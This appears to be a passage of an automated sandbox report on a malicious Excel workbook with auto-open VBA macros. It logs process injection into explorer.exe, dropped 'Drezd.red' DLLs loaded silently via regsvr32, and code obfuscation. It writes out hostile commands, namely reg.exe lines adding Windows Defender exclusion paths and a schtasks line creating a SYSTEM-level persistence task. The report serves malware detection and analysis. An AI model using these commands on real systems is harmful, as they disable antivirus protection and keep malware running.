Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1D89 8_2_005E1D89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1000 8_2_005E1000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1827 8_2_005E1827
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10016EB0 8_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10012346 8_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10011758 8_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10014FC0 8_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000F6EB0 11_2_000F6EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000F2346 11_2_000F2346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000F1758 11_2_000F1758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000F4FC0 11_2_000F4FC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D242A 12_2_001D242A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1424 12_2_001D1424
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D3726 12_2_001D3726
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D2C41 12_2_001D2C41
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D4495 12_2_001D4495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001DB114 12_2_001DB114
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1D89 12_2_001D1D89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1000 12_2_001D1000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1827 12_2_001D1827
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1C5D 12_2_001D1C5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D34DA 12_2_001D34DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D3073 12_2_001D3073
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D32EB 12_2_001D32EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D4162 12_2_001D4162
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10016EB0 12_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10012346 12_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10011758 12_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10014FC0 12_2_10014FC0
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Compensation-2308017-09272021.xls OLE, VBA macro line: Sub auto_open()
Source: Compensation-2308017-09272021.xls OLE, VBA macro line: Sub auto_close()
Source: Compensation-2308017-09272021.xls OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: Compensation-2308017-09272021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 4_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 4_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 8_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 8_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 12_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 12_2_1000CB77
PE file does not import any functions
Source: Drezd.red.5.dr Static PE information: No import functions for PE file found
Source: Drezd1.red.11.dr Static PE information: No import functions for PE file found
Source: Drezd2.red.17.dr Static PE information: No import functions for PE file found
Source: Drezd.red.14.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
Document contains embedded VBA macros
Source: Compensation-2308017-09272021.xls OLE indicator, VBA macros: true
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................3..........&A.....(.P.............8.......`.........................................................................3..... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(............... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................(...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........).....N.......(............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF102.tmp Jump to behavior
Source: classification engine Classification label: mal100.expl.evad.winXLS@34/15@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 4_2_1000D523
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_100030B7 StartServiceCtrlDispatcherA, 12_2_100030B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_100030B7 StartServiceCtrlDispatcherA, 12_2_100030B7
Source: Compensation-2308017-09272021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 4_2_1000ABA3
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{526DFF4B-742D-4615-933D-F361B4AFFD72}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{B679F068-5F86-42B7-A140-3EB78A7914AE}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{D5B7291B-5BC5-4AA0-A2E0-203831E973BD}
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{B679F068-5F86-42B7-A140-3EB78A7914AE}
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{526DFF4B-742D-4615-933D-F361B4AFFD72}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{D5B7291B-5BC5-4AA0-A2E0-203831E973BD}
Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.441003457.0000000002821000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1001A00E push ebx; ret 4_2_1001A00F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1001D485 push FFFFFF8Ah; iretd 4_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1001D4B6 push FFFFFF8Ah; iretd 4_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10019D5C push cs; iretd 4_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10019E5E push cs; iretd 4_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1001BB29 push esi; iretd 4_2_1001BB2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0009A00E push ebx; ret 5_2_0009A00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0009D485 push FFFFFF8Ah; iretd 5_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0009D4B6 push FFFFFF8Ah; iretd 5_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00099D5C push cs; iretd 5_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00099E5E push cs; iretd 5_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0009BB29 push esi; iretd 5_2_0009BB2E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi 8_2_005E2D71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi 8_2_005E2E73
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi 8_2_005E336F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], ebp 8_2_005E33F4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push edi; mov dword ptr [esp], 00000004h 8_2_005E340B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], edx 8_2_005E346C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A push 00000000h; mov dword ptr [esp], esi 8_2_005E276D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A push 00000000h; mov dword ptr [esp], edi 8_2_005E288F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A push 00000000h; mov dword ptr [esp], ebx 8_2_005E28C3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A push 00000000h; mov dword ptr [esp], edi 8_2_005E2B65
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp 8_2_005E376E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], edx 8_2_005E3A0E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi 8_2_005E3B55
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push esi; mov dword ptr [esp], 00000001h 8_2_005E3D71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ecx 8_2_005E3D9C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp 8_2_005E3E46
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi 8_2_005E3E72
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi 8_2_005E3F52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp 8_2_005E3F76
PE file contains sections with non-standard names
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name: .rdatat
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name: .rdatat
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name: .rdatat
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name: .rdatat
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name: .rdatat
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name: .rdatat
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name: .rdatat
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress, 4_2_1000DFAD

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd2.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_100030B7 StartServiceCtrlDispatcherA, 12_2_100030B7

Hooking and other Techniques for Hiding and Protection:

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2124 base: DF102D value: E9 BA 4C 29 FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2988 base: DF102D value: E9 BA 4C 2F FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2544 base: DF102D value: E9 BA 4C 29 FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 284 base: DF102D value: E9 BA 4C 2F FF Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
